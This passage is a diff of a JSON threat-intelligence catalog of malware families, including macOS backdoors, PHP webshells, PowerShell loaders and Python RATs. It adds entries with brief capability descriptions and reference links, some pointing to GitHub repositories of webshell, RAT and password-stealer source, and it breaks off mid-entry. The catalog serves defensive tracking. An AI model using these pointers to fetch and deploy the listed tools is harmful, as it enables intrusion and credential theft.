"description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://objective-see.com/blog/blog_0x5F.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a73468d5-2dee-4828-8bbb-c37ea9295584", + "value": "WatchCat" + }, { "description": "", "meta": { @@ -3212,7 +6204,10 @@ "https://objective-see.com/blog/blog_0x3D.html", "https://objective-see.com/blog/blog_0x3B.html", "https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/", - "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf" + "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/" ], "synonyms": [], "type": [] @@ -3225,8 +6220,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", - "https://401trg.pw/winnti-evolution-going-open-source/", - " https://401trg.pw/an-update-on-winnti/" + "https://401trg.pw/winnti-evolution-going-open-source/" ], "synonyms": [], "type": [] @@ -3254,6 +6248,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://objective-see.com/blog/blog_0x43.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], @@ -3267,9 +6262,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", "https://twitter.com/PhysicalDrive0/status/845009226388918273", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-twilight" ], "synonyms": [], "type": [] @@ -3277,6 +6273,21 @@ "uuid": "858f4396-8bc9-4df8-9370-490bbb3b4535", "value": "X-Agent (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/", + "https://objective-see.com/blog/blog_0x5F.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "041aee7f-cb7a-4199-9fe5-494801a18273", + "value": "XCSSET" + }, { "description": "", "meta": { @@ -3296,7 +6307,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort", - "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/" + "https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/", + "https://objective-see.com/blog/blog_0x53.html" ], "synonyms": [], "type": [] @@ -3304,11 +6316,28 @@ "uuid": "725cd3eb-1025-4da3-bcb1-a7b6591c632b", "value": "Yort" }, + { + "description": "Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell", + "https://github.com/tennc/webshell/tree/master/php/Ani-Shell", + "http://ani-shell.sourceforge.net/" + ], + "synonyms": [ + "anishell" + ], + "type": [] + }, + "uuid": "7ef3c0fd-8736-47b1-8ced-ca7bf6d27471", + "value": "Ani-Shell" + }, { "description": "Antak is a webshell written in ASP.Net which utilizes PowerShell.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.antak", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx", "http://www.labofapenetrationtester.com/2014/06/introducing-antak.html" ], @@ -3318,12 +6347,59 @@ "uuid": "88a71ca8-d99f-416a-ad29-5af12212008c", "value": "ANTAK" }, + { + "description": "C99shell is a PHP backdoor that provides a lot of functionality, for example:\r\n\r\n\r\n* run shell commands;\r\n* download/upload files from and to the server (FTP functionality);\r\n* full access to all files on the hard disk;\r\n* self-delete functionality.\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.c99", + "https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html" + ], + "synonyms": [ + "c99" + ], + "type": [] + }, + "uuid": "cd1b8ec2-dbbd-4e73-b9a7-1bd1287a68f2", + "value": "c99shell" + }, + { + "description": "FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion's File Transfer Appliance.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a", + "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html", + "https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a782aac8-168d-4691-a182-237d7d473e21", + "value": "DEWMODE" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/" + ], + "synonyms": [ + "Ensiko" + ], + "type": [] + }, + "uuid": "dfd8deac-ce86-4a22-b462-041c19d62506", + "value": "Ensikology" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], @@ -3332,12 +6408,24 @@ "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", "value": "PAS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker", + "https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e94a5b44-f2c2-41dc-8abb-6de69eb38241", + "value": "RedHat Hacker WebShell" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", - "https://github.com/wso-shell", "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "synonyms": [ @@ -3366,25 +6454,95 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", - "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", + "https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933", + "https://marcoramilli.com/2019/05/02/apt34-glimpse-project/", + "https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://nsfocusglobal.com/apt34-event-analysis-report/", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/", - "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", + "https://ironnet.com/blog/chirp-of-the-poisonfrog/", + "https://www.netscout.com/blog/asert/tunneling-under-sands" ], "synonyms": [ - "Glimpse" + "Glimpse", + "Poison Frog" ], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", "value": "BONDUPDATER" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200", + "https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7373c789-2dc2-4867-9c60-fa68f8d971a2", + "value": "CASHY200" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://vblocalhost.com/uploads/VB2020-46.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6f0f034a-13f1-432d-bc70-f78d7f27f46f", + "value": "FlowerPower" + }, + { + "description": "Loader used to deliver FRat (see family windows.frat)", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "385a3dca-263d-46be-b84d-5dc09ee466d9", + "value": "FRat Loader" + }, + { + "description": "The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode", + "https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm", + "https://www.zscaler.com/blogs/research/ftcode-ransomware--new-version-includes-stealing-capabilities", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md", + "https://www.certego.net/en/news/malware-tales-ftcode/", + "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/", + "https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f727a05e-c1cd-4e95-b0bf-2a4bb64aa850", + "value": "FTCODE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", - "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" + "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/", + "https://research.checkpoint.com/malware-against-the-c-monoculture/" ], "synonyms": [], "type": [] @@ -3392,13 +6550,60 @@ "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader", + "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html", + "https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html", + "https://blog.threatstop.com/upgraded-jasperloader-infecting-machines" + ], + "synonyms": [], + "type": [] + }, + "uuid": "286a14a1-7113-4bed-97ce-8db41b312a51", + "value": "JasperLoader" + }, + { + "description": "According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot", + "https://twitter.com/VK_Intel/status/1329511151202349057", + "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "319c4b4f-2901-412c-8fa5-70be75ba51cb", + "value": "LightBot" + }, + { + "description": "The author describes Octopus as an \"open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.\"\r\n\r\nIt is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus", + "https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", + "https://isc.sans.edu/diary/26918", + "https://github.com/mhaskar/Octopus" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c3ca7a89-a885-444a-8642-31019b34b027", + "value": "Octopus (Powershell)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig", "https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html", - "https://twitter.com/MJDutch/status/1074820959784321026?s=19" + "https://twitter.com/MJDutch/status/1074820959784321026?s=19", + "https://threatpost.com/oilrig-apt-unique-backdoor/157646/" ], "synonyms": [], "type": [] @@ -3420,11 +6625,40 @@ "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerbrace", + "https://norfolkinfosec.com/osint-reporting-on-dprk-and-ta505-overlap/", + "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7b334343-0045-4d65-b28a-ebf912c7aafc", + "value": "PowerBrace" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper", + "https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/", + "https://twitter.com/InQuest/status/1285295975347650562" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6544c75b-809f-4d31-a235-8906d4004828", + "value": "PowerPepper" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], @@ -3433,11 +6667,39 @@ "uuid": "60d7f668-66b6-401b-976f-918470a23c3d", "value": "POWERPIPE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor", + "https://github.com/chrisjd20/powershell_web_backdoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4310dcab-0820-4bc1-8a0b-9691c20f5b49", + "value": "powershell_web_backdoor" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower", + "https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/", + "https://securelist.com/recent-cloud-atlas-activity/92016/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0959a02e-6eba-43dc-bbbf-b2c7488e9371", + "value": "PowerShower" + }, { "description": "POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" ], "synonyms": [], @@ -3464,12 +6726,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerstats", + "https://blog.prevailion.com/2020/01/summer-mirage.html", + "https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/", + "https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/", + "http://www.secureworks.com/research/threat-profiles/cobalt-ulster", + "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", "https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/", - "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", - "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", "https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/", "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/", + "https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.secureworks.com/research/threat-profiles/cobalt-ulster", "https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/" ], "synonyms": [ @@ -3480,6 +6749,25 @@ "uuid": "b81d91b5-23a4-4f86-aea9-3f212169fce9", "value": "POWERSTATS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerton", + "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.symantec.com/security-center/writeup/2019-062513-4935-99", + "https://norfolkinfosec.com/apt33-powershell-malware/", + "https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/", + "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "08d5b8a4-e752-48f3-ac6d-944807146ce7", + "value": "POWERTON" + }, { "description": "", "meta": { @@ -3493,6 +6781,36 @@ "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", "value": "PowerWare" }, + { + "description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure", + "https://github.com/hausec/PowerZure" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f5fa77e9-9851-48a6-864d-e0448de062d4", + "value": "PowerZure" + }, + { + "description": "DLL loader that decrypts and runs a powershell-based downloader.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powgoop", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", + "https://unit42.paloaltonetworks.com/thanos-ransomware/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.cyberscoop.com/muddywater-iran-symantec-middle-east/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d8429f6d-dc4b-4aae-930d-234156dbf354", + "value": "PowGoop" + }, { "description": "", "meta": { @@ -3525,7 +6843,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", - "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + "https://youtu.be/pBDu8EGWRC4?t=2492", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", + "https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html" ], "synonyms": [], "type": [] @@ -3539,6 +6859,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", + "https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" ], "synonyms": [], @@ -3547,24 +6868,84 @@ "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks", + "https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3c627182-e4ee-4db0-9263-9d657a5d7c98", + "value": "Schtasks" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat", + "https://github.com/YSCHGroup/SkyRAT" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8e5d7d24-9cdd-4376-a6c7-967273dfeeab", + "value": "skyrat" + }, { "description": "sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", - "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", - "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", - "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", + "https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/", + "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", + "https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/", + "https://threatpost.com/sload-spying-payload-delivery-bits/151120/", + "https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/", + "https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan", + "https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], - "synonyms": [], + "synonyms": [ + "Starslord" + ], "type": [] }, "uuid": "e78c0259-9299-4e55-b934-17c6a3ac4bc2", "value": "sLoad" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.snugy", + "https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "773a6520-d164-4727-8351-c4201b04f10b", + "value": "Snugy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.swrort", + "https://github.com/itsKindred/malware-analysis-writeups/blob/master/swrort-dropper/swrort-stager-analysis.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3347a1bc-6b4d-459c-98a5-746bab12d011", + "value": "Swrort Stager" + }, { "description": "", "meta": { @@ -3591,6 +6972,50 @@ "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", "value": "ThunderShell" }, + { + "description": "Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001", + "https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "77231587-0dbe-4064-97b5-d7f4a2e3dc67", + "value": "Unidentified PS 001" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine", + "https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/", + "https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry", + "https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/", + "https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/", + "https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf", + "https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "beb4f2b3-85d1-491d-8ae1-f7933f00f820", + "value": "WannaMine" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader", + "https://twitter.com/blackorbird/status/1247834024711577601" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c9ef106e-def9-4229-8373-616a298ed645", + "value": "WannaRen Downloader" + }, { "description": "", "meta": { @@ -3604,6 +7029,32 @@ "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", "value": "WMImplant" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist", + "https://github.com/NullArray/Archivist" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2095a09c-3fdd-4164-b82e-2e9a41affd8e", + "value": "Archivist" + }, + { + "description": "Ares is a Python RAT.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.ares", + "https://github.com/sweetsoftware/Ares" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c4a578de-bebe-49bf-8af1-407857acca95", + "value": "Ares" + }, { "description": "", "meta": { @@ -3611,7 +7062,6 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", @@ -3624,11 +7074,118 @@ "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c", + "https://github.com/0x09AL/DropboxC2C" + ], + "synonyms": [], + "type": [] + }, + "uuid": "53dd4a8b-374e-48b6-a7c8-58af0e31f435", + "value": "DropboxC2C" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer", + "https://github.com/nairuzabulhul/KeyPlexer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93", + "value": "KeyPlexer" + }, + { + "description": "The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne", + "https://github.com/AlessandroZ/LaZagne", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c752f295-7f08-4cb0-92d5-a0c562abd08c", + "value": "LaZagne" + }, + { + "description": "An IRC bot written in (obfuscated) Python code. Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.", + "meta": { + "refs": [ + 